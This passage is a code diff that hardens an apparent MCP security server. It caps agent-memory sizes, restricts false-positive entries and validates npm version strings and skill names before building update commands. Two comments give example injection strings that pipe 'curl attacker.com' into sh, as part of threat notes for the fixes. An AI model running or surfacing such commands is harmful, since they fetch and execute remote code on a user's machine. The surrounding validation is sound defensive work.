+ affectedFiles: z.array(z.string().max(256)).max(50).optional(),
537
+ suppressUntil: z.string().datetime().optional(),
538
+ addedBy: z.literal("agent").describe("Only agents may add false-positive entries; blocks attacker-injected 'addedBy' fields")
539
+ });
540
+ // CWE-400: cap on individual memory entries to prevent disk exhaustion
541
+ const MAX_MEMORY_ITEMS = 500;
542
+ const MAX_PATTERN_ITEM_LENGTH = 2048; // characters per pattern string item
543
+ const MAX_INTEL_BYTES = 65536; // 64 KB
449
544
  export const WriteAgentMemorySchema = z.object({
450
545
  agentName: z.string().describe("Agent name whose memory to update."),
451
546
  data: z.object({
452
- patterns: z.array(z.unknown()).optional(),
453
- falsePositives: z.array(z.unknown()).optional(),
454
- remediations: z.array(z.unknown()).optional(),
547
+ patterns: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional(),
548
+ falsePositives: z.array(FalsePositiveEntrySchema).max(MAX_MEMORY_ITEMS).optional(),
549
+ remediations: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional(),
455
550
  intel: z.unknown().optional(),
456
- errors: z.array(z.unknown()).optional()
551
+ errors: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional()
457
552
  })
458
553
  });
459
554
  export async function writeAgentMemory(args) {
@@ -468,9 +563,14 @@ export async function writeAgentMemory(args) {
468
563
  const append = (file, newItems, existing) => {
469
564
  if (!newItems?.length)
470
565
  return;
471
- const merged = [...existing, ...newItems];
566
+ // CWE-400: cap total entries to prevent disk exhaustion
567
+ const merged = [...existing, ...newItems].slice(-MAX_MEMORY_ITEMS);
568
+ const serialized = JSON.stringify(merged, null, 2) + "\n";
569
+ if (Buffer.byteLength(serialized, "utf-8") > MAX_INTEL_BYTES) {
570
+ throw new Error(`Memory file "${file}" would exceed 64 KB size cap after write — trim existing entries first.`);
571
+ }
472
572
  const p = join(dir, file);
473
- writeFileSync(p, JSON.stringify(merged, null, 2) + "\n", "utf-8");
573
+ writeFileSync(p, serialized, "utf-8");
474
574
  written.push(p);
475
575
  };
476
576
  append("patterns.json", data.patterns, readJson(join(dir, "patterns.json"), []));
@@ -484,7 +584,12 @@ export async function writeAgentMemory(args) {
484
584
  const intelObj = (typeof data.intel === "object" && data.intel !== null)
485
585
  ? Object.fromEntries(Object.entries(data.intel).filter(([k]) => !PROTO_KEYS.has(k)))
486
586
  : {};
487
- writeFileSync(p, JSON.stringify({ ...intelObj, fetchedAt: new Date().toISOString() }, null, 2) + "\n", "utf-8");
587
+ const intelPayload = JSON.stringify({ ...intelObj, fetchedAt: new Date().toISOString() }, null, 2) + "\n";
588
+ // CWE-400: reject intel blobs over 64 KB
589
+ if (Buffer.byteLength(intelPayload, "utf-8") > MAX_INTEL_BYTES) {
590
+ throw new Error(`Intel payload exceeds 64 KB size cap (${Buffer.byteLength(intelPayload, "utf-8")} bytes).`);
591
+ }
592
+ writeFileSync(p, intelPayload, "utf-8");
488
593
  written.push(p);
489
594
  }
490
595
  return { written };
@@ -494,43 +599,57 @@ export async function writeAgentMemory(args) {
494
599
  export const CheckUpdatesSchema = z.object({
495
600
  currentMcpVersion: z.string().describe("Currently installed security-mcp version (from package.json).")
496
601
  });
497
- export async function checkUpdates(args) {
498
- const { currentMcpVersion } = args;
499
- // Check npm for MCP update
500
- let latestMcpVersion = null;
602
+ /** Fetch and validate the latest security-mcp version from npm. Returns null on failure. */
603
+ async function fetchLatestMcpVersion() {
501
604
  const npmRaw = await httpsGet(NPM_REGISTRY_URL, MAX_NPM_BYTES, 3000);
502
- if (npmRaw) {
503
- try {
504
- latestMcpVersion = JSON.parse(npmRaw).version ?? null;
505
- }
506
- catch { /* ignore */ }
605
+ if (!npmRaw)
606
+ return null;
607
+ try {
608
+ const parsed = JSON.parse(npmRaw).version ?? null;
609
+ // CWE-20: reject malformed version strings — a MitM could return a crafted
610
+ // version like "1.0.0 && curl attacker.com | sh" to inject shell commands.
611
+ if (parsed && SEMVER_RE.test(parsed))
612
+ return parsed;
613
+ if (parsed)
614
+ console.warn(`[checkUpdates] Ignoring malformed version string from npm registry: ${JSON.stringify(parsed)}`);
507
615
  }
508
- // Check skills manifest for skill updates
509
- const skillUpdates = [];
510
- const versions = readJson(SKILL_VERSIONS_PATH, {});
616
+ catch { /* ignore parse error */ }
617
+ return null;
618
+ }
619
+ /** Fetch the skills manifest and return a list of skills that have a newer version. */
620
+ async function fetchSkillUpdates(versions) {
511
621
  const manifestRaw = await httpsGet(SKILLS_MANIFEST_URL, MAX_MANIFEST_BYTES, 3000);
512
- if (manifestRaw) {
513
- try {
514
- const manifest = JSON.parse(manifestRaw);
515
- for (const [name, entry] of Object.entries(manifest.skills)) {
516
- const current = versions[name]?.version;
517
- if (current && current !== entry.version) {
518
- skillUpdates.push({ skillName: name, currentVersion: current, latestVersion: entry.version });
519
- }
520
- }
521
- }
522
- catch { /* ignore */ }
622
+ if (!manifestRaw)
623
+ return [];
624
+ try {
625
+ const manifest = JSON.parse(manifestRaw);
626
+ return Object.entries(manifest.skills).flatMap(([name, entry]) => {
627
+ const current = versions[name]?.version;
628
+ return current && current !== entry.version
629
+ ? [{ skillName: name, currentVersion: current, latestVersion: entry.version }]
630
+ : [];
631
+ });
523
632
  }
633
+ catch { /* ignore parse error */ }
634
+ return [];
635
+ }
636
+ export async function checkUpdates(args) {
637
+ const { currentMcpVersion } = args;
638
+ const versions = readJson(SKILL_VERSIONS_PATH, {});
639
+ const [latestMcpVersion, skillUpdates] = await Promise.all([
640
+ fetchLatestMcpVersion(),
641
+ fetchSkillUpdates(versions)
642
+ ]);
524
643
  const hasUpdate = (latestMcpVersion !== null && latestMcpVersion !== currentMcpVersion) ||
525
644
  skillUpdates.length > 0;
526
- let changelog = "";
645
+ const changelogParts = [];
527
646
  if (latestMcpVersion && latestMcpVersion !== currentMcpVersion) {
528
- changelog += `security-mcp: ${currentMcpVersion} → ${latestMcpVersion}\n`;
647
+ changelogParts.push(`security-mcp: ${currentMcpVersion} → ${latestMcpVersion}`);
529
648
  }
530
649
  if (skillUpdates.length > 0) {
531
- changelog += `Skills with updates: ${skillUpdates.map((s) => s.skillName).join(", ")}`;
650
+ changelogParts.push(`Skills with updates: ${skillUpdates.map((s) => s.skillName).join(", ")}`);
532
651
  }
533
- return { hasUpdate, currentMcpVersion, latestMcpVersion, skillUpdates, changelog };
652
+ return { hasUpdate, currentMcpVersion, latestMcpVersion, skillUpdates, changelog: changelogParts.join("\n") };
534
653
  }
535
654
  // 8. apply_updates (returns instructions for the SKILL.md to surface to user)
536
655
  // ---------------------------------------------------------------------------
@@ -544,11 +663,27 @@ export async function applyUpdates(args) {
544
663
  const { choice, latestMcpVersion, skillUpdates } = args;
545
664
  const commands = [];
546
665
  if (latestMcpVersion) {
666
+ // CWE-20 / TM-004: latestMcpVersion is caller-supplied (not guaranteed to come from
667
+ // fetchLatestMcpVersion which validates against SEMVER_RE). A compromised npm
668
+ // registry response or a direct MCP call could inject shell metacharacters into the
669
+ // command string. Even though applyUpdates only *returns* commands (never execs them),
670
+ // a crafted string like "1.0.0; curl attacker.com|sh" would be surfaced to the user
671
+ // for copy-paste execution. Reject non-semver versions defensively.
672
+ if (!SEMVER_RE.test(latestMcpVersion)) {
673
+ throw new Error(`applyUpdates: latestMcpVersion "${latestMcpVersion}" is not a valid semver string. ` +
674
+ `Refusing to generate update commands to prevent command injection.`);
675
+ }
547
676
  commands.push(`npm install -g security-mcp@${latestMcpVersion}`);
548
677
  commands.push(`security-mcp install`);
549
678
  }
550
679
  if (skillUpdates?.length) {
551
- commands.push(`# Re-download updated skills (handled automatically next time /ciso-orchestrator runs)`, ...skillUpdates.map((s) => `# skill: ${s.skillName} will be refreshed via orchestration.ensure_skill`));
680
+ // CWE-20: validate skillName before interpolating into command strings
681
+ const safeSkills = skillUpdates.filter((s) => SAFE_SKILL_NAME_RE.test(s.skillName));
682
+ const rejectedCount = skillUpdates.length - safeSkills.length;
683
+ if (rejectedCount > 0) {
684
+ console.warn(`[applyUpdates] Rejected ${rejectedCount} skill(s) with unsafe names.`);
685
+ }
686
+ commands.push(`# Re-download updated skills (handled automatically next time /ciso-orchestrator runs)`, ...safeSkills.map((s) => `# skill: ${s.skillName} will be refreshed via orchestration.ensure_skill`));
552
687
  }
553
688
  const message = choice === "auto"
554
689
  ? `Run the following commands to update:\n${commands.filter((c) => !c.startsWith("#")).join("\n")}`